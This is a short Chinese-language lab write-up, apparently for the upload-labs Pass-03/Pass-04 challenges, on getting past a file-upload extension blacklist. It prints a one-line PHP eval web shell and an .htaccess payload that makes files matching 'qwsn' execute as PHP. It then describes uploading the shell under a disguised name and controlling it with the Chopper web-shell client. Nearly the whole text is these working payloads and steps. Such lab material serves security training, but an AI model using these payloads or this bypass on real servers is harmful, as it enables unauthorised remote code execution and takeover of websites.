一、Pass-03/Pass-04
1、上传一个shell.php
shell.php内容为:<?php @eval($_POST['123']);?>
结果,提示不允许上传.asp .aspx .php .jsp后缀的文件
2、黑名单未限制.htaccess的情况:
①、上传.htaccess文件
文件内容为:<FilesMatch "qwsn">
SetHandler application/x-httpd-php
</FilesMatch>
1、由于后端,也就是服务器端的后缀名黑名单限制很多,并且没有限制.htaccess文件
2、我们直接使用.htaccess 让匹配qwsn这四个字符的文件,被解析为PHP形式
//.htaccess的作用:就是任意添加PHP解析的匹配文件
3.注意:.htaccess生效的条件:
在Apache服务器的配置文件httpd.conf中:
①、AllowOverride None 改为: AllowOverride All
②、把LoadModule rewrite_module modules/mod_rewrite.so前面的注释符号#删除
③、.htaccess文件必须要在网站的根目录下,比如此处的WWW下才行,而且apache需要重启 (这个百度来的,瞎扯。。。。的吧这个)
如下图所示,上传.htaccess文件成功
②、上传qwsn976,即可
qwsn976内容为:<?php @eval($_POST['123']);?>
如下图所示,上传成功
3、菜刀连接即可
